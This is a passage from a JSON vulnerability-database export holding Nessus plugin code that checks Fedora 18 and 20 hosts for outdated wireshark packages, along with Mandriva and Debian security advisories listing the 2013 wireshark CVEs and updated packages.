\"CVE-2013-4933\", \"CVE-2013-4934\", \"CVE-2013-4935\");\n script_bugtraq_id(59992, 59994, 59995, 59998, 59999, 60021, 60495, 60498, 60499, 60500, 60501, 60502, 60503, 60504, 60505, 60506, 61471, 62868);\n script_xref(name:\"FEDORA\", value:\"2013-17635\");\n\n script_name(english:\"Fedora 18 : wireshark-1.10.2-4.fc18 (2013-17635)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"dumpcap now stores temporary capture files in /var/tmp\n\n - Convert automake/pkgconfig files into patches (better\n upstream integration)\n\n - Restored category in the *.desktop file\n\n - Install another one necessary header file -\n frame_data_sequence.h\n\n - Add basic OpenFlow dissector\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Enhance desktop integration (*.desktop and MIME-related\n files)\n\n - Add basic OpenFlow dissector\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Enhance desktop integration (*.desktop and MIME-related\n files)\n\n - Add basic OpenFlow dissector\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Ver. 1.10.2\n\n - Various security fixes\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=965110\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=965111\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=965112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=965186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=965190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=965192\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=965193\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=965194\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=965195\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972679\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972681\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972682\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972683\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972684\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972685\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972687\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972688\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990155\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990156\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990157\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990163\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990164\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990165\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990166\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990167\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990168\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990170\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990178\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990179\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-December/124287.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?518731a2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/12/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"wireshark-1.10.2-4.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:11:11", "description": "dumpcap now stores temporary capture files in /var/tmp\n\n - Convert automake/pkgconfig files into patches (better\n upstream integration)\n\n - Restored category in the *.desktop file\n\n - Install another one necessary header file -\n frame_data_sequence.h\n\n - Add basic OpenFlow dissector\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Enhance desktop integration (*.desktop and MIME-related\n files)\n\n - Add basic OpenFlow dissector\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Enhance desktop integration (*.desktop and MIME-related\n files)\n\n - Add basic OpenFlow dissector\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Ver. 1.10.2\n\n - Various security fixes\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2013-10-03T00:00:00", "title": "Fedora 20 : wireshark-1.10.2-7.fc20 (2013-17627)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4921", "CVE-2013-4079", "CVE-2013-4931", "CVE-2013-4076", "CVE-2013-4928", "CVE-2013-4926", "CVE-2013-4933", "CVE-2013-3562", "CVE-2013-4078", "CVE-2013-4924", "CVE-2013-4920", "CVE-2013-4927", "CVE-2013-3559", "CVE-2013-4932", "CVE-2013-3558", "CVE-2013-3555", "CVE-2013-4075", "CVE-2013-3560", "CVE-2013-4923", "CVE-2013-4925", "CVE-2013-4083", "CVE-2013-4922", "CVE-2013-4929", "CVE-2013-4935", "CVE-2013-4930", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-3557", "CVE-2013-4080", "CVE-2013-4934", "CVE-2013-4074", "CVE-2013-4077"], "modified": "2013-10-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wireshark", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2013-17627.NASL", "href": "https://www.tenable.com/plugins/nessus/70280", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-17627.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70280);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-3555\", \"CVE-2013-3557\", \"CVE-2013-3558\", \"CVE-2013-3559\", \"CVE-2013-3560\", \"CVE-2013-3562\", \"CVE-2013-4074\", \"CVE-2013-4075\", \"CVE-2013-4076\", \"CVE-2013-4077\", \"CVE-2013-4078\", \"CVE-2013-4079\", \"CVE-2013-4080\", \"CVE-2013-4081\", \"CVE-2013-4082\", \"CVE-2013-4083\", \"CVE-2013-4920\", \"CVE-2013-4921\", \"CVE-2013-4922\", \"CVE-2013-4923\", \"CVE-2013-4924\", \"CVE-2013-4925\", \"CVE-2013-4926\", \"CVE-2013-4927\", \"CVE-2013-4928\", \"CVE-2013-4929\", \"CVE-2013-4930\", \"CVE-2013-4931\", \"CVE-2013-4932\", \"CVE-2013-4933\", \"CVE-2013-4934\", \"CVE-2013-4935\");\n script_bugtraq_id(59992, 59994, 59995, 59998, 59999, 60021, 60495, 60498, 60499, 60500, 60501, 60502, 60503, 60504, 60505, 60506, 61471);\n script_xref(name:\"FEDORA\", value:\"2013-17627\");\n\n script_name(english:\"Fedora 20 : wireshark-1.10.2-7.fc20 (2013-17627)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"dumpcap now stores temporary capture files in /var/tmp\n\n - Convert automake/pkgconfig files into patches (better\n upstream integration)\n\n - Restored category in the *.desktop file\n\n - Install another one necessary header file -\n frame_data_sequence.h\n\n - Add basic OpenFlow dissector\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Enhance desktop integration (*.desktop and MIME-related\n files)\n\n - Add basic OpenFlow dissector\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Enhance desktop integration (*.desktop and MIME-related\n files)\n\n - Add basic OpenFlow dissector\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Ver. 1.10.2\n\n - Ver. 1.10.1 fix missing ws_symbol_export.h\n\n - Ver. 1.10.2\n\n - Various security fixes\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=965110\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=965111\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=965112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=965186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=965190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=965192\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=965193\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=965194\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=965195\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972679\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972681\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972682\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972683\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972684\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972685\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972687\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=972688\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990155\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990156\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990157\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990163\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990164\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990165\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990166\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990167\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990168\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990170\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990178\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=990179\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-October/117883.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c9978cc6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"wireshark-1.10.2-7.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "cvelist": ["CVE-2013-4083", "CVE-2013-4081", "CVE-2013-3557", "CVE-2013-4074"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2013:172\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : wireshark\r\n Date : June 12, 2013\r\n Affected: Business Server 1.0, Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities has been found and corrected in wireshark:\r\n \r\n * The ASN.1 BER dissector could crash (CVE-2013-3557).\r\n * The CAPWAP dissector could crash (CVE-2013-4074).\r\n * The HTTP dissector could overrun the stack (CVE-2013-4081).\r\n * The DCP ETSI dissector could crash (CVE-2013-4083).\r\n \r\n This advisory provides the latest version of Wireshark (1.6.16)\r\n which is not vulnerable to these issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3557\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4074\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4081\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4083\r\n http://www.wireshark.org/docs/relnotes/wireshark-1.6.15.html\r\n http://www.wireshark.org/docs/relnotes/wireshark-1.6.16.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Enterprise Server 5:\r\n ee7dc085336b1112178dabcf9efcbfd6 mes5/i586/dumpcap-1.6.16-0.1mdvmes5.2.i586.rpm\r\n b3f0ee150e0cc4733bc6181784e3db0b mes5/i586/libwireshark1-1.6.16-0.1mdvmes5.2.i586.rpm\r\n ae18d8a751ddf6d0197a7259d4958dd7 mes5/i586/libwireshark-devel-1.6.16-0.1mdvmes5.2.i586.rpm\r\n ce85c65696abc4a9112200d73334a2a0 mes5/i586/rawshark-1.6.16-0.1mdvmes5.2.i586.rpm\r\n 9492d3e3dfccc7cc28b40558f2efc964 mes5/i586/tshark-1.6.16-0.1mdvmes5.2.i586.rpm\r\n bfb3a5facb92c41b43ec428b71bf6292 mes5/i586/wireshark-1.6.16-0.1mdvmes5.2.i586.rpm\r\n daefcf5e5f2e955df6bb39ce38f6adc2 mes5/i586/wireshark-tools-1.6.16-0.1mdvmes5.2.i586.rpm \r\n 13f53e174e10e8f7bf6b4896ea785067 mes5/SRPMS/wireshark-1.6.16-0.1mdvmes5.2.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n 0e30acd436f428bf94164f2c2437ec37 mes5/x86_64/dumpcap-1.6.16-0.1mdvmes5.2.x86_64.rpm\r\n 24515452924f9b39dac572d541eb7135 mes5/x86_64/lib64wireshark1-1.6.16-0.1mdvmes5.2.x86_64.rpm\r\n b29c2e1acb4bbdbeac5db892353c58a3 mes5/x86_64/lib64wireshark-devel-1.6.16-0.1mdvmes5.2.x86_64.rpm\r\n b86457579d9a945a5e1859186ae40d04 mes5/x86_64/rawshark-1.6.16-0.1mdvmes5.2.x86_64.rpm\r\n 2a5971317b64668b1a0492ef05288707 mes5/x86_64/tshark-1.6.16-0.1mdvmes5.2.x86_64.rpm\r\n d22feab79bec9cd2dcffd339482cf8c2 mes5/x86_64/wireshark-1.6.16-0.1mdvmes5.2.x86_64.rpm\r\n 9b49117a0bcc4427bd5d725cd9c5152a mes5/x86_64/wireshark-tools-1.6.16-0.1mdvmes5.2.x86_64.rpm \r\n 13f53e174e10e8f7bf6b4896ea785067 mes5/SRPMS/wireshark-1.6.16-0.1mdvmes5.2.src.rpm\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 2390468bd95bc55cf6380912c651df30 mbs1/x86_64/dumpcap-1.6.16-1.mbs1.x86_64.rpm\r\n 1640e819389b89792aeb281daaad14b4 mbs1/x86_64/lib64wireshark1-1.6.16-1.mbs1.x86_64.rpm\r\n 1c29c375c42970380dce6e30c6a59193 mbs1/x86_64/lib64wireshark-devel-1.6.16-1.mbs1.x86_64.rpm\r\n edde8d7961d033ac5d76678604d19548 mbs1/x86_64/rawshark-1.6.16-1.mbs1.x86_64.rpm\r\n 4cbfe7fe1c7b27bb69fb6863d5db7f6b mbs1/x86_64/tshark-1.6.16-1.mbs1.x86_64.rpm\r\n 637924c40d0bff5b4149d2baa6a68f0d mbs1/x86_64/wireshark-1.6.16-1.mbs1.x86_64.rpm\r\n 5e7375e0d750820e503635794e6f2636 mbs1/x86_64/wireshark-tools-1.6.16-1.mbs1.x86_64.rpm \r\n 80a49547bf467b19038b4688a0aed2b3 mbs1/SRPMS/wireshark-1.6.16-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFRuDfAmqjQ0CJFipgRAlYAAJwIpuOTE4GKqXJ9niV1xIIynwW/jwCdEhY/\r\nJrhSt0wlpzW0Q1pgi4L6v7g=\r\n=wYly\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2013-06-17T00:00:00", "published": "2013-06-17T00:00:00", "id": "SECURITYVULNS:DOC:29462", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29462", "title": "[ MDVSA-2013:172 ] wireshark", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:51", "bulletinFamily": "software", "cvelist": ["CVE-2013-3562", "CVE-2013-3559", "CVE-2013-3558", "CVE-2013-3555", "CVE-2013-3560", "CVE-2013-4083", "CVE-2013-4081", "CVE-2013-3557", "CVE-2013-4074"], "description": "Vulnerabilities in GTPv2,\r\nASN.1 BER, PPP CCP, DCP ETSI, MPEG DSM-CC, CAPWAP, HTTP, DCP ETSI and Websocket dissectors.", "edition": 1, "modified": "2013-06-17T00:00:00", "published": "2013-06-17T00:00:00", "id": "SECURITYVULNS:VULN:13095", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13095", "title": "Wireshark multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:21:27", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4076", "CVE-2013-4078", "CVE-2013-4075", "CVE-2013-4083", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-4074", "CVE-2013-4077"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2709-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJune 17, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : wireshark\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-4074 CVE-2013-4075 CVE-2013-4076 CVE-2013-4077 \n CVE-2013-4078 CVE-2013-4081 CVE-2013-4082 